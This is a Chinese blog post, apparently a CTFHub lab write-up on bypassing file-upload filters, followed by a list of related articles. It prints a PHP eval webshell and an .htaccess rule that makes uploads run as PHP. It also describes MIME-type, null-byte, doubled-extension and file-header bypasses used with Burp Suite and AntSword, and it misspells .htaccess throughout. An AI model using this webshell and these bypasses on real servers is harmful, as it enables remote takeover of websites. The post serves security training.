CTFHub |文件上传 (无验证, 前端验证, .haccess绕过, MIME绕过, 00截断, 双写后缀, 文件头检查)

最新推荐文章于 2024-04-17 21:39:09 发布
最新推荐文章于 2024-04-17 21:39:09 发布
阅读量1.1k 收藏 8
点赞数 8
分类专栏: CTF 文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73688004/article/details/136590128
版权

CTFHub | 文件上传

  • 无验证

  1. 使用工具:中国剑蚁(D:\AntSword_Loader\AntSword-Loader-v4.0.3-win32-x64\AntSword.exe)

在下载这个工具的时候,浏览器拦截说有病毒。使用git clone下载。十分丝滑。

  1. 先上传文件a.php
<?php
@eval($_POST['hack']);
?>

页面回显文件被放在:/load/a.php中

  1. 打开中国剑蚁,右键添加数据,输入url(http://xxx.com/load/a.php), 输入‘连接密码’:hack, 点击添加。
  2. 打开数据条,遍历目录,发现flag文件。

  • 前端验证

  1. 查看网页源代码,发现js有对文件类型的验证。限制只能上传 .jpg .png .gif的文件。
  2. 对a.php改名:a.jpg,成功添加进文件。
  3. burpsuite抓包,修改filename为a.php,为了服务器那边能够以.php的形式运行它。
  4. 利用剑蚁工具,步骤同<无验证>这一题。
  5. 总结:先顺着js验证在前端上传文件,然后在赶在后端处理之前修改回去。

  • .haccess绕过

  1. 查看网页源代码,发现blacklist, 于是明白是.haccess绕过题, 先上传一个.haccess文件到服务器后端,配置成可以通过无后缀文件。
<FilesMatch "filename">
SetHandler application/x-httpd-php
</FilesMatch>
  1. 再按照<无验证>这一题的方法上传a.php文件。
  2. 迷惑? 这一题我第一次做的时候.haccess写错了,标签名字写成了FileMatch, 后续步骤一样,也能得到网页文件,但只有一个,且只有一行,写着错误的flag。奇怪。

  • MIME绕过

  1. 先上传文件a.php
  2. burpsuite抓包拦截,改Content-Type字段。
将:
Content-Type: application/octet-stream     # 告知以流文件形式下载文件,只知道这是二进制文件。
改成:
Content-Type: image/gif

注意:

这里有两个Content-Type字段,第一个用来限定文件显示范围的,第二个才是限定文件类型。

  1. <无验证>套路

  • 00 截断

php5.2 00截断上传的原理

文件上传绕过之00截断_00截断绕过-CSDN博客

  1. 迷惑?为什么直接在上传文件命名为a.php%00.gif提交后,页面提示上传成功,但是实际上没有?而且路径也变成/htm/upload/,这个路径十分奇怪啊。
  2. 解决办法:burpsuite抓包,改第一行路径,加上a.php%00.gif

  • 双写后缀

  1. 过滤策略:将白名单上的后缀替换为空。
  2. 构造特殊的文件名,如a.pasahp, 这样的话,经过替换,最终得到的文件是a.php。

这里很奇特的一点:我尝试构造a.phpphp,上传后的文件是a. 也就是说,两个php都被替换为空了。猜测这个str_ireplace()函数应该是设置一个指针,遍历整个字符串,边遍历便查找,一经找到就删除,继续往后查找,而不是找到第一个就删除并返回。

  1. 下同<无验证>

  • 文件头检查

  1. 第一种方法:按理来说应该也可以,上传也成功,但是出现不解的问题。

    1. 先提交一个.png文件(不宜太大,大了上传不了),burpsuite抓包,然后修改文件名为a.php,在文件内容里面(文件末尾)添加一句话木马。
    <?php @eval($_POST['hack']); ?>

    b. <无验证>

    c. 出现问题:剑蚁连接得上,但是返回{}空。

  2. 第二种方法:Winhex打开a.php文件。复制89504E47, 在文件开头>编辑>剪贴板数据>粘贴>ASCII Hex, 保存退出。直接上传a.php文件。<无验证>

Coding Happily
关注
  • 8
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[GXYCTF2019]BabyUpload - 文件上传+绕过(后缀&文件类型&文件内容&.htaccess)
oZuoShen123的博客
10-11 595
1、上传一句话,提示“后缀不允许ph” 2、修改后缀为jpg,提示“上传类型也太露骨了吧!” 3、修改类型为image/jpeg,提示“诶,别蒙我啊,这标志明显还是php啊” 4、修改一句话的标识为: @eval($_POST["pwd"]); 5、上传.htaccess
php.ini运行.htaccess文件_CTF丨.htaccess文件的利用,没有比它更全面的文章了! (20210121学习笔记)...
weixin_36438989的博客
01-22 315
.htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过.htaccess文件,可以改变所在文件夹和子文件下的php.ini配置。在CTF赛题中,如果能够上传或者写入一个.htaccess,就可以做到绕过WAF、文件包含等操作,笔者之前参加比赛时看到过.htaccess文件的利用,于是将各种用法总结出来分享给大家,希望有所帮助。本文是 i 春秋论坛作家...
文件上传笔记(.htaccess
weixin_43827234的博客
08-11 71
最后连接119.jpg这个文件就可以连接了。然后在上传点先上传.htaccess文件。然后再上传名为119.jpg的图片马。首先确定网站是PHP编写的。
CTFHUB-技能树-Web题-文件上传前端验证文件检查
最新发布
Static______的博客
04-17 887
由此可见,只要是相同类型的文件,他的文件就是一样的,这样代表了这个文件是属于什么类型,既然本题用到的是文件检查,那我们制作一个图片马,将我们的一句话代码放入图片里面然后进行上传。我们先创造一个名为1.png的图片,然后写一个名为1.php的一句话代码,把他们放到同一目录下,用cmd生成一个名为2.php的图片马。右侧开%PNG就是这个文件文件,这也代表了这个文件是一个png文件,打开一个jpg文件。简单来说,就是每个文件的最开部分,就是文件,他代表了这个文件的是属于什么类型,例如。
upload-labs 04(上传.htaccess
LuckySec
11-05 2174
题目 首先查看源码 该代码对常见的多种类型文件后缀名进行了限制上传, 但是仔细可以发现,并没有对htaccess文件进行限制。 于是,我们可以先上传一个htaccess文件,再上传一个图片马,进行绕过检测上传。 htaccess小知识 .htaccess文件(或者&amp;amp;quot;分布式配置文件&amp;amp;quot;),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中...
文件上传+CTF题目
unexpectedthing的博客
10-27 2377
文章目录概念:文件上传绕过:1.绕过js代码:2.绕过服务端(MIME类型)3.绕过黑名单绕过白名单图片马文件上传后利用蚁剑进行连接后门 概念: web客户端在上传文件时,没有对上传文件的内容,扩展名等进行过滤。 文件上传绕过: 1.绕过js代码: (1)一般的web网页前端在上传文件时,都会利用js代码对文件的扩展名。也就是说,如果对文件的扩展名进行过滤了,可能是js代码的作用了。 (2)方法:利用火狐的about:config来禁用js代码执行。 先使用可以使用的扩展名进行上传,利用bp抓包,改数据包扩
htconvert:将.htaccess重定向转换为nginx.conf重定向
02-05
htconvert 将.htaccess重定向转换为nginx.conf重定向。 安装 npm install --global htconvert 用法 $ cat .htaccess | htconvert > nginxRedirects.conf # or $ htconvert -f .htaccess > nginxRedirects.conf ...
Haccess 97-开源
05-09
标题 "Haccess 97-开源" 暗示了我们正在讨论的是一个开源项目,其目标是提供对Microsoft Access数据库(以MDB和jet格式)的读取能力,特别是为了数据导出和恢复。在IT领域,开源软件意味着源代码是公开的,允许用户...
maleha97
04-01
"AKTIFKAN SESSION DI .HACCESS"这一句可能是在提及一种特定的配置或操作,".haccess"是Apache服务器配置文件的一种,全称为".htaccess",用于对网站进行各种权限控制,比如URL重写、限制访问、设置密码保护等。...
建立动态的WML站点(一)
12-17
支持WAP功能的移动电话越来越...你运行的是Apache并且可写.haccess文件;或者你运行IIS并且你可以增加映射(或者你可以让系统管理员帮你的忙); 4.你有WML的相关知识; 好了,第一步首先让你的服务器知道使用PHP来处理
CTFHub技能树web之文件上传(一)
wzhwzh123321的博客
02-15 1283
使用蚁剑连接,上传的.htaccess文件文件名字只能是.htaccess,只能有后缀而不能有文件的名,比如1.htaccess等,在第一次上传中我使用了1.htaccess,在后续上传jpg格式文件后服务器没有自动将jpg解析为php文件,需要注意。JavaScript会对我们上传的文件进行限制,允许图片格式上传,可以通过上传图片马或者使用bp修改一下文件后缀即可,本题使用bp修改文件后缀的方法,先将文件后缀修改为.jpg格式,文件上传然后抓包。文件上传目录权限:确保上传目录的适当权限设置非常重要。
ctfhub文件上传---文件检查
x2813488062的博客
01-29 2223
解题思路 每个文件都有自己的标识符,在文件传输时会进行检测 文件检查,在进行文件上传时不仅对文件格式进行了校验,也对文件内容进行了验证 我们可以把木马文件包含在可验证文件中 来绕过验证 解题 用画图工具创建一个简单的png文件,复杂的会报错 然后在把png文件进行上传,用Br抓包,把脚本内容插入png内容中,并把png文件修改为php文件 拿到相对地址后,可查看相对地址内容是否正确有误 用Hackbar对PHP文件传递数据,查看是否有误(也可以将phpinfp();直接写入木马.
ctfhub 文件上传综合
kindyyy的博客
05-18 902
无限制(用bp插入木马也行) 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。 无限制就直接使用蚁剑,先写一个一句话木马(从百度上找找???) (ps:eval()函数:还有php,eval允许执行任何php的代码,而php代码又可以调用系统,post传入的字符串会以php的形式运行)相当于是一句话木马的解释吧.... 然后将他上传到题目中, 上传完成后打开蚁剑,将URL地址复制粘贴进去,后面要记得加上uploa
CTFHUB WEB 文件上传(上)
wwwwyyyrre的博客
04-26 770
在浏览器中显示的内容有 HTML、有 XML、有 GIF、还有 Flash ……抓一下包试试 正常情况都是可以抓到包的 如果在你的bp以及代理都没问题的情况下抓不到包并且还有提示该文件不允许上传 那么可能就是使用了js前端验证。因为这道题无验证 说明只要是文件就可以上传 因此上传一个一句话木马 php文件 再用蚁剑连接就能拿到其flag。在文件上传漏洞中 js函数的主要作用就是验证你上传的文件类型是不是它允许的文件类型。了解了这些 我们正式进入实战 这里用的是ctfhub技能树的文件上传题目。
CTFHUB-技能树-Web题-文件上传(无验证,JS前端验证前端验证
Static______的博客
04-15 837
htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。】后,弹出的【另存为】对话框,在【文件名】一栏中输入【.htaccess】,【保存类型】选择【所有文件】,然后选择要保存的路径,单击【保存】按钮!上传后显示相对路径,访问此路径,发现可以访问,且木马执行成功。此时,再上传一句话木马,并把文件改为png格式。
CTFHub | Web——文件上传前端验证
2301_76435948的博客
10-07 684
在通过验证之后还未发出时,拦截HTTP请求,然后修改数据,使得JavaScript的验证不起作用。虽然将后缀名改回.php,里面的代码仍然存在,但是我想要的是图片形式的木马啊(Q_Q)cmd 将该木马文件复制到任意图片中,利用文件包含漏洞解析图片木马。cmd 将该木马文件复制到任意图片中,利用文件包含漏洞解析图片木马。JavaScript属于前端验证,在浏览器未提交数据时进行验证。修改图片内容 在图片txt格式末尾加一句话木马。修改图片内容 在图片txt格式末尾加一句话木马。利用工具edjpgcom。
CTFHUB 文件上传漏洞
qq_75120258的博客
02-04 848
定义:文件上传漏洞是web系统中常见的一种功能,通过文件上传能实现上传图片、视频,以及其他类型的文件,但是随着web中包含的功能越来越多,潜在的网络安全风险也就越大。如果恶意用户上传了可执行的文件或者脚本,就会导致网站被其控制甚至会使其服务器沦陷,以至于引发恶意的网络安全事件。一般是因为站点开放了文件上传功能,但却对上传的文件没有进行足够的限制。程序开发部署时,没有考虑到系统特性、过滤不严格。站点服务器存在解析漏洞,被黑客利用后导致可以上传任意文件
CTFHub-文件上传-文件检测
qq_60905276的博客
11-20 1681
文件检测:我们要上传.php,但题目会对上传的后缀名进行限制。 像题目里只允许jpg,png,gif,所以我们可以把木马输入一个用txt打开的简单的png图片里,上传后再抓包修改文件后缀名。
ctfhub 文件上传验证
m0_52432374的博客
02-18 478
ctfhub验证 解题方法: 题目名称就叫做无验证-文件上传,那么无验证–>对上传的文件没有做任何验证。所以上传木马–>获得靶机shell–>利用蚁剑在网站(服务器)中寻找flag。 1.上传yjh.php 2.得到上传文件相对路径upload/yjh.php 3.构造payload: http://challenge-f31f46b88104a514.sandbox.ctfhub.com:10080/upload/yjh.php 4.用蚁剑连接,找到flag文件 ...
CTFHub日记,ctfhub文件上传验证
dqx1223的博客
01-09 1987
ctfhub文件上传—无验证

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值